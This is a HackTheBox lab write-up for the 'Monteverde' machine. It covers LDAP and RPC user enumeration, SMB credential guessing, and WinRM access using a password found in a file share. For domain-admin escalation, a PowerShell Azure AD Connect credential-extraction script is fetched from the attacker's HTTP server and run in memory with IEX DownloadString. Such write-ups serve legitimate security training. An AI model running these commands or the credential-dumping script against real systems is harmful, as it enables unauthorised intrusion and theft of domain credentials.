Monteverde Writeup (HackTheBox)
🗓️ Published:
Table of Contents
Enumeration #
Port Scan #
As usual we start off with a port scan.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ sudo nmap -Pn -sS -p1-10000 -sV -T5 10.10.10.172 -nv
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-11 19:29:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message FramingThis looks like a domain controller, so chances are there's going to be some Active Directory angle to this box, but let's see.
SMB #
Anonymous SMB did not work.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbclient -L 10.10.10.172 -U '' -N
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbmap -H 10.10.10.172 -u ''
[+] IP: 10.10.10.172:445 Name: 10.10.10.172LDAP #
Next, we try and use ldapsearch to enumerate LDAP. First, we get the search base, and then we try to anonymously bind to the server.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ ldapsearch -x -h 10.10.10.172 -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=MEGABANK,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ ldapsearch -x -h 10.10.10.172 -D '' -w '' -b "DC=MEGABANK,DC=LOCAL" | tee ldap.txt
# extended LDIF
#
# LDAPv3
# base <DC=MEGABANK,DC=LOCAL> with scope subtree
...
# numResponses: 271
# numEntries: 267
# numReferences: 3The anonymous bind worked, and gave back plenty of information. For now, let's try and extract all the logon names we can.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ grep 'samaccountname' ldap.txt -i | cut -d ' ' -f 2 | tee users.txt
Guest
...
AAD_987d7f2f57d2
...
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
...
dgalanos
roleary
smorganWe can attempt to corroborate this list by anonymously using rpcclient.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ rpcclient -U '' 10.10.10.172 -N
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]Foothold #
Back to SMB #
Now we have many possible usernames, but still no credentials to work with. Before beginning a password spray attack where we try common passwords with all the users we found, let's try something simpler. We'll use msfconsole to attempt to login with both blank passwords, and the username as the password.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.172
RHOSTS => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.10.172 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
...
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: '.\SABatchJobs:S********s'
...
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedThank goodness for lazy administrators, right? Let's see what this newfound access buys us. Here is what we know from LDAP:
# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: SABatchJobs
givenName: SABatchJobs
distinguishedName: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103124846.0Z
whenChanged: 20200611182530.0Z
displayName: SABatchJobs
uSNCreated: 41070
uSNChanged: 65568
name: SABatchJobs
objectGUID:: A2gA4Cnwv0eHK29I4GEMLQ==
userAccountControl: 66048
badPwdCount: 60
codePage: 0
countryCode: 0
badPasswordTime: 132363742375357201
lastLogoff: 0
lastLogon: 132363742212690386
pwdLastSet: 132225293263922346
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKgoAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: SABatchJobs
sAMAccountType: 805306368
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103124846.0Z
dSCorePropagationData: 16010101000000.0Z
mS-DS-ConsistencyGuid:: A2gA4Cnwv0eHK29I4GEMLQ==
lastLogonTimestamp: 132363735309034440Not too much to go off there. Let's see whether we have access to any SMB shares.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'S********s'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLYQuite a few to go through!
User #
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbclient //10.10.10.172/azure_uploads -U 'SABatchJobs%S********s'
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Fri Jan 3 07:43:06 2020
.. D 0 Fri Jan 3 07:43:06 2020
524031 blocks of size 4096. 519955 blocks availableNothing in the azure_uploads share. Let's try users$ next.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ sudo smbclient //10.10.10.172/users$ -U 'SABatchJobs%S********s'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> recurse on
smb: \> dir
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
\dgalanos
. D 0 Fri Jan 3 08:12:30 2020
.. D 0 Fri Jan 3 08:12:30 2020
\mhope
. D 0 Fri Jan 3 08:41:18 2020
.. D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020
\roleary
. D 0 Fri Jan 3 08:10:30 2020
.. D 0 Fri Jan 3 08:10:30 2020
\smorgan
. D 0 Fri Jan 3 08:10:24 2020
.. D 0 Fri Jan 3 08:10:24 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> get mhope\azure.xml
getting file \mhope\azure.xml of size 1212 as mhope\azure.xml (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> exitAwesome, one whole file! What's inside?
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ cat mhope\\azure.xml
...
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
...
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
...
<S N="Password">4********$</S>
...A plaintext credential! There's no indication of which user this belongs to, but let's assume it belongs to mhope since it was in their user directory.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbmap -H 10.10.10.172 -u mhope -p '4********$'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLYAnd would you look at that, we've successfully logged in. What does LDAP have to say about mhope?
# Mike Hope, London, MegaBank Users, MEGABANK.LOCAL
dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
...
memberOf: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
memberOf: CN=Remote Management Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
...Looks like he's in the Remote Management Users group, meaning he actually has the ability to login over WinRM (port 5985). To do so, let's use evil-winrm.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ evil-winrm -i 10.10.10.172 -u 'megabank\mhope' -p '4********$'Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> dir
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> dir
Directory: C:\Users\mhope
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/3/2020 5:35 AM .Azure
d-r--- 1/3/2020 5:24 AM 3D Objects
d-r--- 1/3/2020 5:24 AM Contacts
d-r--- 6/11/2020 3:06 PM Desktop
d-r--- 1/3/2020 5:24 AM Documents
d-r--- 1/3/2020 5:24 AM Downloads
d-r--- 1/3/2020 5:24 AM Favorites
d-r--- 1/3/2020 5:24 AM Links
d-r--- 1/3/2020 5:24 AM Music
d-r--- 1/3/2020 5:24 AM Pictures
d-r--- 1/3/2020 5:24 AM Saved Games
d-r--- 1/3/2020 5:24 AM Searches
d-r--- 1/3/2020 5:24 AM Videos
*Evil-WinRM* PS C:\Users\mhope> dir Desktop
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
*Evil-WinRM* PS C:\Users\mhope> type Desktop\user.txt
496........2f2Privilege Escalation #
Something that I've learned doing these types of Windows boxes is that group memberships are often useful to look at. We saw that mhope was a member of Azure Admins , whatever that is. We also saw the string Microsoft.Azure.Commands.ActiveDirectory in the file where we found mhope's password.
There's also this interesting username with hex characters in it.
*Evil-WinRM* PS C:\Users\mhope\Documents> dir C:\Users
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 2:53 PM AAD_987d7f2f57d2
d----- 1/2/2020 9:35 PM Administrator
d----- 1/3/2020 5:31 AM mhope
d-r--- 1/2/2020 9:35 PM PublicFurthermore, we see something called Azure Active Directory Connect and Azure AD Sync while performing our recon of the box.
*Evil-WinRM* PS C:\Users\mhope\Documents> dir "C:\Program Files"
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:31 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
d----- 1/2/2020 2:32 PM Microsoft.NET
d----- 1/3/2020 5:28 AM PackageManagement
d----- 1/2/2020 9:37 PM VMware
d-r--- 1/2/2020 2:46 PM Windows Defender
d----- 1/2/2020 2:46 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 1/2/2020 2:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 1/2/2020 2:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 1/3/2020 5:28 AM WindowsPowerShellA whole lot of searching and reading later, we stumble across this very informative article.
What We're Doing #
If I understand the article correctly - and Azure AD is definitely something I need to research more - basically Active Directory credentials can be used to authenticate with Active Directory hosted in Azure (sort of like a domain controller as a service I guess). However, in order to do that, the on-site domain controller needs a way to synchronize AD credentials with the cloud. To do so, the Azure AD Connect installation creates a new user with a bunch of hex characters in it which is the user account that has the rights to perform DRS (Directory Replication Services). This account then does the synchronization.
The article details how we can go about decrypting the password for this account, at which point you could use the account to perform a DCSync operation of your own and get domain admin hashes.
Exploitation #
We see that the first line in the author's PowerShell script is to create a SQL connection using a connection string.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"So, I set off to figure out said connection string for myself. First, I verified that a SQL Server instance was even running.
*Evil-WinRM* PS C:\Users\mhope\Documents> netstat -ano | findstr "LISTEN"
...
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 3576
...With that confirmed, next I tried issuing a SQL command from PowerShell to see if I could even execute SQL queries.
*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "SELECT GETDATE() AS TimeOfQuery"
TimeOfQuery
-----------
6/11/2020 7:20:03 PMFrom here, I started to perform some manual recon. I started off by listing databases.
*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "SELECT name FROM master.dbo.sysdatabases"
name
----
master
tempdb
model
msdb
ADSyncWell, the database named ADSync looks promising and matches everything I've read on the Internet so far - so at least I'm communicating with the right SQL instance. Next I listed the tables.
*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "SELECT * FROM ADSync.INFORMATION_SCHEMA.TABLES"
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
ADSync dbo mms_metaverse BASE TABLE
ADSync dbo mms_metaverse_lineageguid BASE TABLE
ADSync dbo mms_metaverse_lineagedate BASE TABLE
ADSync dbo mms_connectorspace BASE TABLE
ADSync dbo mms_cs_object_log BASE TABLE
ADSync dbo mms_cs_link BASE TABLE
ADSync dbo mms_management_agent BASE TABLE
ADSync dbo mms_synchronization_rule BASE TABLE
ADSync dbo mms_csmv_link BASE TABLE
ADSync dbo mms_metaverse_multivalue BASE TABLE
ADSync dbo mms_mv_link BASE TABLE
ADSync dbo mms_partition BASE TABLE
ADSync dbo mms_watermark_history BASE TABLE
ADSync dbo mms_run_history BASE TABLE
ADSync dbo mms_run_profile BASE TABLE
ADSync dbo mms_server_configuration BASE TABLE
ADSync dbo mms_step_history BASE TABLE
ADSync dbo mms_step_object_details BASE TABLEPerfect, mms_server_configuration is one of the tables that we need in this PowerShell script. Now, to figure out what connection string I can use to execute this same command. Going through the list of connection strings found here, I eventually formulated the following string which worked.
*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "select * from INFORMATION_SCHEMA.TABLES;" -ConnectionString "Data Source=MONTEVERDE;Initial Catalog=ADSync;Trusted_Connection=True"
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
ADSync dbo mms_metaverse BASE TABLE
ADSync dbo mms_metaverse_lineageguid BASE TABLE
ADSync dbo mms_metaverse_lineagedate BASE TABLE
ADSync dbo mms_connectorspace BASE TABLE
ADSync dbo mms_cs_object_log BASE TABLE
ADSync dbo mms_cs_link BASE TABLE
ADSync dbo mms_management_agent BASE TABLE
ADSync dbo mms_synchronization_rule BASE TABLE
ADSync dbo mms_csmv_link BASE TABLE
ADSync dbo mms_metaverse_multivalue BASE TABLE
ADSync dbo mms_mv_link BASE TABLE
ADSync dbo mms_partition BASE TABLE
ADSync dbo mms_watermark_history BASE TABLE
ADSync dbo mms_run_history BASE TABLE
ADSync dbo mms_run_profile BASE TABLE
ADSync dbo mms_server_configuration BASE TABLE
ADSync dbo mms_step_history BASE TABLE
ADSync dbo mms_step_object_details BASE TABLEBefore running the script, I confirmed that one other file key to this whole operation was present.
*Evil-WinRM* PS C:\Users\mhope\Documents> dir 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
Directory: C:\Program Files\Microsoft Azure AD Sync\Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/31/2018 4:54 PM 335744 mcrypt.dllWith a valid string and DLL present on the host, all that was left was for me to tweak the PowerShell file, host it on an HTTP server, and then run it on target.
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ cat AzureADConnect.ps1
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=MONTEVERDE;Initial Catalog=ADSync;Trusted_Connection=True"
...
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...```powershell *Evil-WinRM* PS C:\Users\mhope\Downloads> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.110:8000/AzureADConnect.ps1') AD Connect Sync Credential Extract POC (@_xpn_)
Domain: MEGABANK.LOCAL
Username: administrator
Password: d********!
Even though the article said this would work, I was still blown away by just how simple this was once I knew where to look. Interstingly enough, I was expecting credentials for the *AAD_987d7f2f57d2* user, but instead I got the password for *Administrator*. This may be because *Administrator* was configured as the user to do the credential synchronization? Had this not been the case, my next step would have been to use Impacket's `secretsdump.py` remotely (logging in with these credentials) to dump *Administrator*'s NTLM hash (which could then be used with pass-the-hash).
But, since this saved me a step, I logged in using WinRM and grabbed the flag.
```shell
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ evil-winrm -i 10.10.10.172 -u 'megabank\administrator' -p 'd********!'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
129........0bc